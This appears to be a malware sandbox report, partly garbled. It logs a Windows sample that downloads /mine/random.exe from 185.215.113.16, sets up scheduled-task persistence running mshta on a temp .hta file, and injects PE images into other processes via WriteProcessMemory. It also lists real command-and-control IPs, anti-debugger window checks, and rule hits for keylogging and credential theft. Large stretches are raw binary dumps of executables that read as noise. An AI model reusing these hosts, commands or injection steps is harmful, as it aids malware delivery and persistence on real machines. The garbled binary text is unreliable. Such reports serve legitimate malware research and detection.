Z'Viëå(6%â|ÖÚØ‚ªûØ\U`†/•q–iôÔ”7¡œÔÄÍæ£ç•×"ǒó€ç¼¸Ï€ÂùÉäö|TLûÑÅ—Ø_Ø# NµRb±Jz»(30’D@O¼[¡oPQ[V£¬ ^Y–U7 ´÷0)…%Ž![K–‹ø€€h8±™o$ŽÎXÝ1/­tŽZÅä3²'†omšÀô(Ó§x‘긐\['TBö♉¸g¹—{k–o3Ôij,_´ˆŠ•Ù”¤ºW*Ž ,’€ô15ÊRE³{!uUÝí&a©]zLüC¤,ø…¤2ËAúQp»ð#L'ô!ƒ€¿,äaŠÜ—A¾TÔ}ú[wØÏ2 é ˆ-a=:`û]‚ÎV<Qq§~Ô4ÞÏ É(ßøb€~G¬×P•™ÑÂ‚Ø · sŽéáÑM¥~ôöÞªŽ»¤6+¿ ²ür"@uˆ(´¥gkt¿5£€aCtßdl%á@:#â-Ÿ{”ÑsA¢É,kŽÑ{Šu°»ã[ÛÐ,9Zž\€§þgià([a/¢¾Œ·Ô<†%¹ä¬Œ¼b‚ÔÛã#K½½ÒZ¶Ì²0f_•šËÕ¸ty*õ.uške¾ŽíQ †•VÄNä [•ù ¥C‚Oõ&¿Í!À nŠ¢Ó×ÀԜzÌ/+ÐßP6„_ÖT\P„:»2ƒìàñ‹•q{L°ÇJ$¹V½‰<óðÉÀTëâ«c¦Š,׬Ÿµo7ápä­vL_Eç«Nj¬%œU8!òö B-,ьR QÁ¹÷3£¸ÙƒÂ•öéÜ PÿMZ˜ ½–'‰üKIXÕ·Ýôdû0!Ç ´á×ЀVzìçb²±Æ¢ù[ŽºV•˜í)•-ƒ¥s֥ݓëâWP|'–Q•üÓóÄdõV7†"ß Aá¹YPµQA€ñ)’™R û%D‚¯˜Ú1uaå๱0ÙAâš`hªáŒa–%%ãVkê‘Á`S_a­ýa*‰mÐß=«u8ÝD;û‚åóÿ‹­^e)¿ã¬Íåîgêo)ù‚=ö–µWفóP´Á«RV<ø5§bl·î-+Òiڈ(w •B†±ÑÆ3^·D‚¯ÏÇ@´&Q+?[±Ÿ +"æƒr R1'†…Þâ¥YlT%°@Ìîì¦J:¸nâ;õ½…€òÒÂlÓúì{“øÏ3¸AO.ô¿óˆp —ͦâ¡Þ‡^qbGp‰Á˜ø/áÀ¤§¿}ú[é³'òÿû”xgOʤŒÔŸ®ÕF%‰È}Èµz(NH©ð¼— Ï·L€@ñjsØHfÈ[Gð`‹u­¤ÿ޹¾)%as’¥µ=²àrða<E’qî)Ýa.ã#†!'‰„×0­üú˜ärLœ¶ÍÅfX8Q7¦jÊì{p嚸` Σãju7S»¾ñƒÇÉÁFMNFÈK*8,E´w6‰.ù“[–íH`ß]?à¿fÅÁr•îtÜI˜SvIíV*Ýa.nX]!¥áK@¯0 ;í+Û`‡il€z­ô)¿‹34~^"a#½[*ó2Éctmö'¡Gdø;º Q ‡ÁB ˆ yj\ö‚<)Ò¯3X"„êžûŒlZ]A*1Æ*Îû2È÷’ Ô2½Ê.\çÎÆóyLƒ_ŒØûµæv<à×ôäVÌð´S„ºè`[Û¨€Áª ïaË «ÉÇV»)V`ˆ‹ÙµÅê&Ö8eüÊÛ¢x‹z¦¢³¹ï9³ f»‡–×½ê%ÀLE^WóÂKÍ?zhMh ¡Á½´ÂAÐñuª`uª¨Úù“Õþê ”Ævq¥·öâHT`~EyòóÂßéäà[½õ„VìÝ8ÈbÔa°Á`.7xú¤‡îzò‘Þ!Pq»Ð¶þ¡Ò†8¾µ"Î!ՁðoMß> XaæpÖ’•êE×äq®!´QýÀó­žg‹¾¡—òà¼%–ÜÙd_éE"êS»˜K¯]רnè J³% ¾{R'փ)„[솞@¾–ÿ'0ÚB]ýšßhØ)ÿõÊpà… iÖwé³_WÝy9NڄW¯Œ¹¾mIzVòå!–F’ú‘…é]§ûSè »JDï0·€×JL= Ñ4…ÑæîÅæä‚a(ƒ¥%4^é¥_ã0A”xæ¼®˜9ü¿"pYéch*»[èïÆ²@EÁ/$C¿o»×1û HÓÀù¹U·ûͽ.”°¼3Nö)àAç<÷sZ ^sdKBüVÜkï‘TþÂÊÀûp2Ê#?ÆÚ…­"Ä +1ÒÌ"1ýÄ%Är5IÖpƄ“½à—¬s‰_Ñ[ê4Þ…á+… ?a·¾ŸãÜÞâ¢a €ëá{€ l@l+ÆQä87ÙLð{è'ã<ï˜~^…Ò [t[éÍò@W‚ƒí(¯0”›ÛD¾.Y=S%µê°ˆÅL­2èÒ×Êa•N&Ñ¿·XGR€ÐóžQ_„ÿp¹¸ï%à²8ÒàÌ&Bh0%,&+ú½zך°œBÚq}7B?@ω…Iô'aE¯ ï©@z]ƒe9×ÔiÒj+ åöÉ-q4h4f¿æ©t¦Q¡§#PéK`úna7®•„&­‡Z·õ³®%(z^脿š¦"- +(ÛoLŸì–Q¡%b[Œ=üI[~•0¼iµ¿jM9¦›ú¥®ŸSõ©ªñ»]Ã’Tºü¢6·ZW FK'S€h† Šv*`ÎAñ8׀ÀYl¸äõœ±ŒûôèÈ÷ ·à_«@ˆy‰i*¿ ž.vYŽ¥Ø)Ã[Q! 3½FQ¦óTÆéòUâo9MwG#àq¸éZEí7¹*`ÜãY{«ހ‰}ØŠ¢'ô %Íèd`O KÜÍéÂ/té‘_‰*Û.‚À;ª‹˜ÊÎĒG.˜ô¿§ª@1Ä\—¾€ÇCHŠRWEà¥ýS3 0T¢;VèKsp’ 1Áš7‰a-dì—ÃhgÍÖ¨â¾QFTS4¤òfµ¬÷˜6HW¦Ìà!Ór@àaJ-½Ï+‰U¤Ùì™Àg,þ×iB²*4ɰ CÀÑ&¢TíXP?Ý>qъ‰ÀÇ|= s@ëa՛æ€)#ÇÛ|–„Iè9A—øZÒº*N€_f€ ú-£a·Û ¿¤ºÉyÎëM@?¿€&SJ⅐î‚Q)…ü\…[é%¹ãÁQ³¶²â^dwIóAPðœà-;1ÍÂ@^SQÕÒT&ÀÄKܦà¸Î±¼:ž$€Y!³”ÐÒ¥@“ ¿åë3ò,KÁ]­/51«dŸ¬N_÷àŒÆ
Data received
Data sent GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
process system
url http://www.microsoft.com/schemas/ie8tldlistdescription/1.0
url http://purl.org/rss/1.0/
url http://www.passport.com
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Hijack network configuration rule Hijack_Network
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Install itself for autorun at Windows startup rule Persistence
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
cmdline C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
cmdline schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
cmdline tasklist
host 185.215.113.16
host 185.215.113.43
host 185.215.113.75
host 62.210.113.223
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2760
region_size: 380928
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000204
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 376832
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000204
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
file \??\SICE
file \??\SIWVID
file \??\NTICE
Time & API Arguments Status Return Repeated

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: RegmonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: Registry Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: FilemonClass
window_name:
0 0

FindWindowA

class_name: #0
window_name: File Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: #0
window_name: Process Monitor - Sysinternals: www.sysinternals.com
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: Regmonclass
window_name:
0 0

FindWindowA

class_name: 18467-41
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: Filemonclass
window_name:
0 0

FindWindowA

class_name: PROCMON_WINDOW_CLASS
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0

FindWindowA

class_name: GBDYLLO
window_name:
0 0

FindWindowA

class_name: pediy06
window_name:
0 0

FindWindowA

class_name: OLLYDBG
window_name:
0 0
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
file C:\Windows\Tasks\skotes.job
cmdline C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
cmdline schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELð¤gà bª`º@Ð@…YœŒ°9œ´.textÊ`b `.rdataó €"f@@.data|ѰNˆ@À.reloc°9:Ö@B
base_address: 0x00400000
process_identifier: 2760
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 2760
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL%žgà fª@¹@À@…ٛŒ€9´.textdf `.rdatas €"j@@.dataôϰNŒ@À.reloc9€:Ú@B
base_address: 0x00400000
process_identifier: 2696
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 2696
process_handle: 0x00000204
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELð¤gà bª`º@Ð@…YœŒ°9œ´.textÊ`b `.rdataó €"f@@.data|ѰNˆ@À.reloc°9:Ö@B
base_address: 0x00400000
process_identifier: 2760
process_handle: 0x00000204
1 1 0

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL%žgà fª@¹@À@…ٛŒ€9´.textdf `.rdatas €"j@@.dataôϰNŒ@À.reloc9€:Ú@B
base_address: 0x00400000
process_identifier: 2696
process_handle: 0x00000204
1 1 0
Time & API Arguments Status Return Repeated

send

buffer: GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Connection: Keep-Alive
socket: 1416
sent: 79
1 79 0
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Feb 2025 01:44:09 GMT Content-Type: application/octet-stream Content-Length: 2121728 Last-Modified: Tue, 11 Feb 2025 01:06:14 GMT Connection: keep-alive ETag: "67aaa286-206000" Accept-Ranges: bytes MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $§»-IãÚCãÚCãÚC¸²@íÚC¸²FBÚC6·GñÚC6·@õÚC6·F–ÚC¸²G÷ÚC¸²BðÚCãÚB5ÚCx´JâÚCx´¼âÚCx´AâÚCRichãÚCPELœVðfà êš J@ÐJŠ‘ @€W kX´}Jd}J €€@à.rsrcX@À.idata  ”@À 0*°–@àwdedeidu°à0¢˜@àbobdrwdlJ: @à.taggant0 J"> @à
received: 2720
socket: 1416
1 2720 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELvtžßà. 0@n^ `@ à `… ^K`˜€ Ô]  H.textt> @ `.rsrc˜`F@@.reloc €L@B.rdata N@À.rdataÀ^@ÀP^HtV¨Û2W$0j~:_€~®(ý é  s ~¯(þþ ~°(~±(  ? rps z*(*2~²( *.~³(*Z~´(~³(*nrêp~²( ~µ(&*.~¶(*†~·(!~²( ~¸(%*2(|( *0t ~~Ži~~Ži(~~Ži@(~~Ži~~Ži(~ ˆ~(*2(|( *Š(| %Ð~¹()€*0j~º(-~»(1 s ~¼(5~  8+ ‘r pŒ~½(9~¾(= X Ži?Ìÿÿÿ*0 AA? È« Û}Z \4A YÒJ [x,Z §^ vÇào %¦ —s' î<Òb G›ø ŸYÓ' ž³ µªE ƒ²¡ :eN Û %`æ ÔY¯] \˾d \Ç¢v û®Q üæ< ]2³ 夭' o½  ·G‡Z ¦ƒ u²T +(ó  æ ò] W÷• ë;Œ wà »!j+ x¾! 6í8" ¼ˆ. Œ&# Äî$ gÓ=% ð;:N& |¦¯K' \›j( pô¹:) _‡áY*&&&(">  nj[m *n!j>&\jn[mn!j=j n[&nj? nj[&8' \#Z:* + ,nj=  Z Y! > n j[i-8"+--~¿(Aœ,--]‘œ-X-- ?Òÿÿÿn(j> %a [&-.84.+-‘X,-‘X ].+.‘0+.+-‘œ+-0œ-X-- ?Àÿÿÿ-.rp/~º(-/~À(E~Á(I/18<-X~º(-/~À(E~Á(I~Â(M]-.+-‘X~º(-/~À(E~Á(I~Â(M].s 22+.‘o +.+-‘œ+-2o œ+-‘+.‘X~º(-/~À(E~Á(I~Â(M]3s 44+3‘o s 551o s r,p5o 77~Ã(Q~¾(=o61‘664o aÒ616œ1X11?¼þÿÿ*0À~Ä(U s  Ži ~Ã(QoŽ9š%:&r>p o~Å(Y ~Æ(] MZ;ÝR <~Ç(a ~È(e PE;Ý' X~Æ(] X~Æ(]XX 8¿ (ZX ~É(i  ~Ê(m"~Ë(q(~º(-r@p~À(E~Á(I~Ì(u9P  X~È(e  X~È(e  €  n~j n~Í(y8 X  ?8ÿÿÿ:ÝÝ&Ýs o o*AFc©2(|( *0G(|$%Ð~¹()€ K%Ð~¹()€€*0~  X~Î(} ~Ï(  8Mš ~  ~Ð(… X~Ñ(‰t& ~Ò(t~Ó(‘X Ži?ªÿÿÿ*2(|( *º(|Ð ~Ô(•~Õ(™~Ö(€ *0W€ Ð ( o € @%Ш( € € €
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ‹@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELà $I¼Ðað”@€ ÷ڝ@œÜ` — œj àú” .texte"I$I `.rdatap¨K@IªK(I@@.data“ð”žҔ@À.idataܐœp™@À.relocj  œ¢t™@B.symtabP B.rsrc—` @@‹$ÃÌÌÌÌÌÌÌÌÌÌÌ̋ $ÃÌÌÌÌÌÌÌÌÌÌÌ̋$ÃÌÌÌÌÌÌÌÌÌÌÌ̋$ÃÌÌÌÌÌÌÌÌÌÌÌ̋,$ÃÌÌÌÌÌÌÌÌÌÌÌ̋4$ÃÌÌÌÌÌÌÌÌÌÌÌ̋<$ÃÌÌÌÌÌÌÌÌÌÌÌÌÿ Go build ID: "JASZKQB4LbrX-hbg6Cm-/rRU0F0grYnhQu81WjEsK/MWYtPQQF8pik79JoYcAD/sIWjWj2ihmIquGx2ZDRm" ÿÌÌÌÌÌÌÌÌÌd‹ ‹‰;av ƒìè&‹D$ ‰$‹D$‰D$èƒÄÃèÉ0ëÇÌÌÌÌÌÌÌd‹ ‹‰;a†ØƒìD‹\$H‹l$Lë‰Í‰ó…í„1ÀéǸÿÿÿÿ…À}1É1ö‰èë'9臎p9õ‚z)ō}ÿ‰ù‡ß÷ۇßÁÿ!þރø|°;cpu.u¨1Òé—ºÿÿÿÿ‰L$,‰t$@…ÒŒI9‡#ƒú‚jü‰l$‡Ý÷ۇÝÁýƒå4+z9ø‚ä‰l$(‰t$4)Ѝhÿ‰l$‡Ý÷ۇÝÁý!ï,;‰l$0ƒøu f}onufƒøëƒøu\f}ofuT|;€?fuKƒø‡Ý”Ç݃úu!f>alu‹|$(\;€;lu ‹Ô­Ù1À镈D$•‹ԭىT$(‹\$1Àéâèì|\‘—‰$ÇD$èօ‹D$0‰$‹D$‰D$腍Ëv˜‰$ÇD$ 謅‹D$4‰$‹D$‰D$蘅©Û–‰$ÇD$肅èí|‹L$,‹t$@éCþÿÿ‰D$‰\$8èc|‚˜‰$ÇD$!èM…‹D$8‰$‹D$‰D$è9…©Û–‰$ÇD$è#…èŽ|‹L$,‹t$@éäýÿÿ‹Эً ԭىL$,1ÒëƒÀB9ʍ™‹X¶h ¶p ‹8‰|$@‹x–„À–tڕ„À•tp¶3–„À–ug‰|$(‰T$$‰D$<è·{Ï˜‰$ÇD$衄‹D$@‰$‹D$(‰D$荄€ý—‰$ÇD$èw„èâ{‹D$<‹L$,‹T$$édÿÿÿ•ˆ•é[ÿÿÿƒÄDÃ@9è1ýÿÿƒÛ4€>,uéé#ýÿÿB9aýÿÿƒ¤,€}=uèéRýÿÿE¶l$‹t$49Ѝ¤‹=Эً-Ô­Ù9èƒñ‰ÅÁà‹t‹<9Þuȉl$$‰D$ ‰<$‹D$4‰D$‰t$è×¶D$ „Àu‹L$,‹T$(‹\$‹l$$둋 ԭًЭًD$$9ȃ‹l$ ÆD+ ‹ ԭًЭÙ9Èso¶|$—ˆD+ —‹L$,‹t$@é6üÿÿè^zò\˜‰$ÇD$èHƒ‹D$4‰$‹D$‰D$è4ƒ©Û–‰$ÇD$èƒè‰z‹L$,‹t$@éßûÿÿèAèA‰éèû@‡ÍˆL ‡ÍF‰Ó9Ø}.‹5ԭً=ЭÙ9ðs0‰ÆÁàÆD ‹=ԭىڋЭÙ9þrÃë ‹t$@é†ûÿÿ‰ð‰ùèª@‰ñè£@‰Á‰øèú@¸‰Ñèî@‰Ñ‰Âè¥@‰Á‰Ðè|@‰ð‰éèÓ@‰Á‰êèŠ@‰éèc@èÍ+éûÿÿÌÌÌÌÌÌÌÌd‹ ‹‰;a†œƒìXྍ‰$èY¬‹D$Ç@ Ðà–‰ ¡ ܉HÇ@ Óà–‰H   ܉HÇ@$ 薉H  ¦ ܉H(Ç@4  {4—‰H0 © ܉H8Ç@D ß—‰H@ « ܉HHÇ@T çᖉHP ¬ ܉HXÇÔ­ÙÇØ­Ù‹ ð܅Éu‰ЭÙë =ЭÙèß>è ‹$ƒøO‹ ԭكÁ‹ЭًØ­Ù9Ës[‰D$(‰$‰L$‰\$ÇD$ ْ‰D$è¿¢‹D$‹L$‹T$‰حًð܅Òu‰ЭÙë =ЭÙè`>‰Â‹D$(‰ ԭكÁûÁáÇD fÇD ‹ð܍< l t ‰t$Tt ‰t$Pt ‰t$Lt (‰t$Ht 0‰t$Dt 8‰t$@t @‰t$<t H…ÛuC—‰ ª ܉\ ë‰ÃC—èÐ=‰ïª ÜèÃ=‰ØÇD fÇD ‹ð܅ÛuÒꖉ\ ­ ܉\ ë"‹|$T‰ÃÒê–è=‹|$P­ Üèr=‰ØÇD $fÇD ,‹ð܅Ûuù–‰\ ¯ ܉\ (ë"‹|$L‰Ãù–è0=‹|$H¯ Üè!=‰ØÇD 4fÇD <‹ð܅Ûuù–‰\ 0° ܉\ 8ë"‹|$D‰Ãù–èß<‹|$@° ÜèÐ<‰ØÇD DfÇD L‹ð܅Ûu ù–‰\ @® ܉\ Hë ‹|$<‰Á ù–èŽ<‰÷® Üè<‰Èƒø3‹ ԭكÁ‹ЭًØ­Ù9ËsS‰$‰L$‰\$ÇD$ ْ‰D$èk ‹D$‹L$‹T$‰حًð܅Òu‰ЭÙë =ЭÙè <‰Â‰ ԭكÁûÁáÇD fÇD ‹ð܍< l t ‰ðt ‰t$8t ‰t$Tt (‰t$4t 0‰t$Lt 8‰t$0t @‰t$Dt H…Ûuëà–‰ ¢ ܉\ ë‰Ãëà–è‚;‰ï¢ Üèu;‰ØÇD fÇD ‹ð܅Ûu&疉\ £ ܉\ ë‰Ç&ç–è7;‹|$8£ Üè(;ÇD $fÇD ,‹ð܅ÛuB疉\ ¤ ܉\ (ë‹|$TBç–èê:‹|$4¤ ÜèÛ:ÇD 4fÇD <‹ð܅ÛuF疉\ 0¥ ܉\ 8ë‹|$LFç–è:‹|$0¥ ÜèŽ:ÇD DfÇD L‹ð܅Ûu$ᖉD @§ ܉D Hë‹|$D$á–èP:‰÷§ ÜèC:Ç$ÇD$è‹D$ƒø‚‰D$$Ç$€ÇD$èú‹D$‰hÜÇ$ÇD$è
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL%žgà fª@¹@À@…ٛŒ€9´.textdf `.rdatas €"j@@.dataôϰNŒ@À.reloc9€:Ú@B‹D$…Àt(€8ïu€x»u €x¿uƒÀ‰D$D$jPèƒÄÃ1ÀÃÌÌÌÌÌÌÌÌÌÌÌÌÌUSWVƒì‹t$,1ہþ‡–‹|$(‹/¶]Sè·¤ƒÄ…Àt%E‰/¶]S蔤ƒÄE…ÀuìM¶ÃƒÀރøY‡Ì1Ûÿ$…,…DèN§ÇD$Pÿ7è|¤ƒÄÝ\$è0§1ۃ8"ÝD$ÙáuÙ(…DÙÉÚéßàžÙîrÝØéúÝØè§ƒ8tèú¦ƒ8"…à‹t$‹/‰ó)ëƒûr+€}0u€}.uFƒûtjhʛDUèD£ƒÄ …Àu€}.u'‰t$‰Þƒîrn¾DÿjPh¦›DèÉ¢ƒÄ ‰ó…Àtà1ÛéxjUhv›Dèü¢ƒÄ …À„)jUh{›Dèä¢ƒÄ …À…HƒÅ‰/jÿ°DƒÄ1ɅÀ…뭋D$‰ƒìÝD$Ý$è8¦ƒÄfƒø»„jÿ°DƒÄ…À„òÇÇ@ÝD$ÝXéjUhq›Dè]¢ƒÄ …À…ÁƒÅ‰/jÿ°DƒÄ…À„©ÇÇ@ëNF‰ù‰òƒÄ^_[]é Ç$‰â‰ùèJ1ۅÀts‰Ç‹4$jÿ°DƒÄ…ÀtUÇÇ@‰x‰p ‰ÃëHF‰ù‰òƒÄ^_[]é( ƒÅ‰/jÿ°DƒÄ…Àt#¹‰ÃÇÇ@‰Hë Wÿ°DƒÄ‰ØƒÄ^_[]ÃÌÌÌÌÌÌÌUSWVP‹\$1ö…ÛtR‹l$…ítJUèC¡ƒÄ‰ÇPUè·ƒÄÇ$‰áQPWUSèñƒÄƒ<$t‹K‹S‹‹‚…Àt ƒxu‹p‰ðƒÄ^_[]ÃÌÌÌÌ̋L$1À…Ét ƒyu‹AÃÌÌÌÌÌÌÌÌÌÌÌÌSWVP‹|$Ùî…ÿt\‹\$…ÛtTÝØSè² ƒÄ‰ÆPSè&ƒÄÇ$‰áQPVSWè`ƒÄƒ<$t‹O‹W‹‹‚…ÀÙîtƒxu ÝØÝ@ëÙîƒÄ^_[ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌ̋L$1À…Ét ƒyu‹AÃÌÌÌÌÌÌÌÌÌÌÌÌUSWVP‹\$1ö…ÛtR‹l$…ítJU蠃ĉÇPU臃ÄÇ$‰áQPWUSèÁƒÄƒ<$t‹K‹S‹‹‚…Àt ƒxu‹p‰ðƒÄ^_[]ÃÌÌÌÌ̋L$1À…Ét ƒyu‹AÃÌÌÌÌÌÌÌÌÌÌÌÌUSWVP‹\$¾ÿÿÿÿ…ÛtR‹l$…ítJU耟ƒÄ‰ÇPUèôƒÄÇ$‰áQPWUSè.ƒÄƒ<$t‹K‹S‹‹‚…Àt ƒxu‹p‰ðƒÄ^_[]ÃÌÌUSWVƒì‹\$ ‹|$j.S艟ƒÄ…Àt{‰Åë$1ÿ‰ëCj.SècŸƒÄ‰Å…ÀtS…ÿtæ…Ûtâ‰î)ÞVSèWƒÄÇD$L$QPVSW莃ă|$t´‹O‹W‹‹‚1ÿ…Àt¤ƒxuž‹xë™1À…ÿtE…ÛtAS臞ƒÄ‰ÆPSèûƒÄÇ$‰áQPVSWè5ƒÄƒ<$t‹O‹W‹‹‚ë1ÀƒÄ^_[]ÃÌÌÌÌÿt$ÿt$èÿÿÿƒÄ‰Á1À…Ét ƒyu‹AÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÿt$ÿt$èÓþÿÿƒÄ‰Á1À…Ét ƒyu‹AÃÌÌÌÌÌÌÌÌÌÌÌÌÌ̋D$…Àt‹@Ã1ÀÃ̋L$1À…Ét‹T$9Qv‹A ‹ÃÌÌÌÌÌÌUSWVP‹|$1ۅÿtU‹l$…ítMU蓝ƒÄ‰ÆPUèƒÄÇ$‰áQPVUWèAƒÄƒ<$t‹O‹W‹‹‚…Àt ‹L$ 1Û9H”É؃Ä^_[]ÃÌ̋L$1À…Ét‹T$9Qv‹A‹ÃÌÌÌÌÌ̋D$…Àt‹@Ã1ÀÃ̋L$1À…Ét‹T$9Qv‹I‹ ‘…Ét ƒyu‹AÃÌÌÌÌÌÌÌÌÌWV‹D$ …Àte‹HƒùtQƒùtƒùuS‹pjjVè ƒÄ ë2‹pƒ~t1ÿ‹Fÿ4¸èµÿÿÿƒÄG;~rìÿvÿ°DƒÄVëÿpÿ°DƒÄ^_ÿ%°DÌÌÌÌÌÌÌÌÌUSWVP¾ÿÿÿÿƒ|$„µ‹l$…í„©ƒ|$ 